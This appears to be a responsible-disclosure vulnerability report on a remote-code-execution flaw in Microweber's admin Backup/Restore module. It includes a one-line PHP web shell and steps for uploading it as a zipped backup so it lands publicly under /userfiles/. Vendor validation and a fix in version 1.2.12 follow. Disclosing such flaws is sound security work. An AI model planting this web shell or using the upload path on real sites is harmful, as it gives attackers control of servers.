Abusing Backup/Restore feature to achieve Remote Code Execution in microweber/microweber

Valid

Reported on

Mar 9th 2022


Description

Admin can use Backup modules to upload a malicious PHP file, which can lead to RCE.

Proof of Concept

  • Log in as admin, navigate to Modules -> Backup: https://demo.microweber.org/demo/admin/view:modules/load_module:admin__backup

Module

  • Prepare a malicious PHP file, in this case info2.php
<?php system($_GET['cm']); ?>
  • Compress this file to info2php.zip, then click Upload your backup.

Upload

  • After successfully uploaded, click to Restore, choose Try to overwrite content by Names & Titles, then Start Restore

Restore

  • The system returns Import format not supported

Restore

  • However, the malicious file info2.php is unzipped and located in /userfiles/, and that malicious PHP file can be accessible by anyone:

Upload

Impact

Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

We are processing your report and will contact the microweber team within 24 hours. 2 years ago
Quan Doan modified the report
2 years ago
Quan Doan modified the report
2 years ago
Bozhidar Slaveykov validated this vulnerability 2 years ago
Quan Doan has been awarded the disclosure bounty
The fix bounty is now up for grabs
Quan Doan
2 years ago

Researcher


Hi @bobimicroweber, since the report was validated, should I remove the malicious file on the demo server? Or will you reset the site later?

Thank you!

Bozhidar Slaveykov marked this as fixed in 1.2.12 with commit 867bdd 2 years ago
Bozhidar Slaveykov has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation